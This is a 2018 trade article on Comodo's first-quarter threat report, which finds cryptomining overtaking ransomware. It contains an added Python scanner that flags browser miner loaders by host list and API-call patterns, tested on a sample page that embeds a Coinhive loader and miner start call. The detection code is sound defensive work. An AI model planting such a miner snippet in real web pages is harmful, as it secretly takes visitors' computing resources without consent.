Comodo: Ransomware Declines, But Cryptomining Takes Off

Cryptomining has surged to the top of detected malware incidents, displacing ransomware, according to a new study.

April 27, 2018

4 Min Read

By Frank J. Ohlhorst

Comodo Cybersecurity’s new report is among the first to fully analyze threat data from the first quarter of the year. The company’s analysis shows a very different picture from 2017, indicating that MSPs may have to change course to combat evolving threats.

The report reveals that protections against ransomware are beginning to work and that cybercriminals are seeking other ways to profit from their activities. MSPs looking to combat evolving threats will need to heed the shift in the attack vectors now becoming prevalent.


Comodo’s Kenneth Geers

“Malware, like cyberspace itself, is merely a reflection of traditional, real-world human affairs, and malware is always written for a purpose, whether it’s crime, espionage, terrorism or war,” said Kenneth Geers, chief research scientist at Comodo Cybersecurity. “Criminals’ proclivities to steal money more efficiently were evident with the surge in cryptomining. And the continued strong correlation of attack volume with current geopolitical events shows hackers of all motivations are well aware of the opportunities major breaking news provides them.”

Cryptominer attacks, which use malware to hijack users’ computers to mine cryptocurrencies, are becoming prevalent yet have remained off most MSPs’ radar, since the malware is hidden and, for the most part, undetectable by the PC’s operator. Therein lies the real danger: cryptominer attacks secretly steal CPU cycles while also co-opting the infected PC into a criminal enterprise.

By eliminating cryptominer malware, MSPs can better protect their customers and restore lost performance, while also demonstrating that they have the ability to fully protect a customer’s assets from evolving attacks.

During the first quarter of 2018, Comodo Cybersecurity detected nearly 29 million cryptominer incidents out of a total of 300 million malware incidents, amounting to a 10 percent share. The number of unique cryptominer variants grew from 93,750 in January to 127,000 in March. At the same time, the data shows this criminal attention came at the expense of ransomware activity, with new variants falling from 124,320 in January to 71,540 in March, a 42 percent decrease.

Other highlights of the Comodo Cybersecurity report for the first quarter include:

  • Hackers subverted Coinhive, Crypto-Loot and other cryptocurrency mining services:  These legitimate companies offer website owners a way to monetize their sites by allowing customers to willingly let their computers be used for mining. The very short JavaScript that enabled the opt-in service, however, was quickly stolen by cybercriminals and used for malicious purposes. Widely and illegitimately spread worldwide by embedding the code into websites, Chrome extensions, typosquatted domains and malvertising, the hackers’ script stealthily uses system resources without the user’s permission to make money by mining cryptocurrencies.

  • Password stealers became more sophisticated and dangerous: Comodo Cybersecurity observed cybercriminals increasingly develop and update malware with the goal of stealing users’ credentials. Comodo Cybersecurity Threat Research Lab analyzed new variants of Pony Stealer, one of the most dangerous password stealers, which now demonstrates new capabilities in both stealing data and in covering its tracks.

  • Expect a ransomware resurgence: Ransomware attacks led the malware market in previous quarters, but showed a radical decrease in the number of overall detections, likely due to the shift to the low-hanging fruit of cryptominers. Ransomware’s overall share of incidents dropped from 42 percent in August to just 9 percent in February. Comodo Cybersecurity Labs caution to prepare for new ransomware attacks in a changed guise, perhaps morphing into a weapon of data destruction – as seen with NotPetya – rather than a tool to extort a ransom.

  • Geopolitical malware detections correlate with current events around the world: In the first quarter, Comodo Cybersecurity analysis yielded potential geopolitical correlations related to national elections in China and Russia. The company discovered correlations in Egypt, India, Iran, Israel, Turkey and Ukraine relative to military operations, along with other trends across Europe, Asia and Africa.

  • Hot zones identified by malware type: Countries that currently have the most acute challenges associated with Trojans, viruses and worms include Brazil, Egypt, India, Indonesia, Iran, Mexico, Nigeria, Philippines, Russia and South Africa. Countries in a higher socioeconomic category – that can afford more professional cyberdefenses – are often plagued by a higher ratio of application malware. Finally, countries that possess unusual malware profiles, such as Belarus, China, Israel, Japan, Kazakhstan, Turkey, the U.K. and Ukraine, are profiled in this report.
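One practical way an MSP can check customer web pages for the embedded miner loaders described in the first highlight above is to scan the page source for the known miner client libraries and for their API calls. The following is an added example and is not code from the Comodo report or from Comodo’s tooling. The host names and constructor names it matches on (CoinHive.Anonymous, CRLT.Anonymous) are assumptions based on the public Coinhive and Crypto-Loot client libraries of the time, and the sample page is constructed for illustration.

```python
"""
Scan HTML for in-browser cryptomining loaders (Coinhive, Crypto-Loot and
similar opt-in miners repurposed without the visitor's consent).

Indicator lists below are ASSUMPTIONS for illustration: they reflect the
public client libraries as commonly observed in 2018, not data from the
Comodo report.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Hosts that served the miner client libraries (assumed indicator list).
MINER_HOSTS = (
    "coinhive.com",
    "coin-hive.com",
    "crypto-loot.com",
    "cryptoloot.pro",
)

# Constructor calls used by those client libraries (assumed patterns).
MINER_API_PATTERNS = (
    re.compile(r"new\s+CoinHive\.(?:Anonymous|User|Token)\s*\(", re.I),
    re.compile(r"new\s+CRLT\.(?:Anonymous|User)\s*\(", re.I),
)

# External <script src=...> tags and inline <script> bodies.
SCRIPT_SRC = re.compile(r"<script[^>]+src\s*=\s*['\"]([^'\"]+)['\"]", re.I)
INLINE_SCRIPT = re.compile(r"<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>", re.I | re.S)
# The 'throttle' option the libraries accept (fraction of CPU time left idle).
THROTTLE = re.compile(r"throttle\s*:\s*([0-9.]+)", re.I)


@dataclass
class Finding:
    kind: str                          # "external_loader" or "inline_api_call"
    evidence: str                      # the script URL or the matched API call
    throttle: Optional[float] = None   # throttle value if one was set inline


def _host_of(src: str) -> str:
    """Return the host part of an absolute or protocol-relative URL."""
    return re.sub(r"^(?:https?:)?//", "", src).split("/")[0].lower()


def scan_html(html: str) -> List[Finding]:
    """Return every miner indicator found in the page source, in document order."""
    findings: List[Finding] = []
    for src in SCRIPT_SRC.findall(html):
        host = _host_of(src)
        if any(host == h or host.endswith("." + h) for h in MINER_HOSTS):
            findings.append(Finding("external_loader", src))
    for body in INLINE_SCRIPT.findall(html):
        for pattern in MINER_API_PATTERNS:
            match = pattern.search(body)
            if match:
                throttle = THROTTLE.search(body)
                findings.append(Finding(
                    "inline_api_call",
                    match.group(0).strip(),
                    float(throttle.group(1)) if throttle else None,
                ))
    return findings


# Constructed sample page: a benign CDN script plus a Coinhive loader and
# its anonymous-mining start call (site key is a placeholder).
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example.net/jquery.min.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
</head><body>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.3});
  miner.start();
</script>
</body></html>"""


if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        print(f.kind, f.evidence, "throttle=%s" % f.throttle)
```

A host and constructor blocklist is only a first pass: once ad blockers started shipping similar lists, loaders were moved behind proxy domains and obfuscated, so in practice this check is paired with endpoint telemetry (sustained browser CPU use on idle pages, unexpected WebAssembly workers) rather than relied on alone.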

With those findings in mind, MSPs can better target security service offerings to bring new levels of protection to their clients. A protection strategy can readily be built around malware detection and remediation, along with stronger credential protection (such as multifactor authentication), while advanced edge filtering can be used to minimize the impact of location-based threats.

Simply put, the data in the report highlights the importance of trust for IT operations today: organizations have to put the right tools in place to ensure that they can trust their applications, connections, users and workflows. Delivering that trust may be one of the most powerful offerings an MSP can bring to bear.
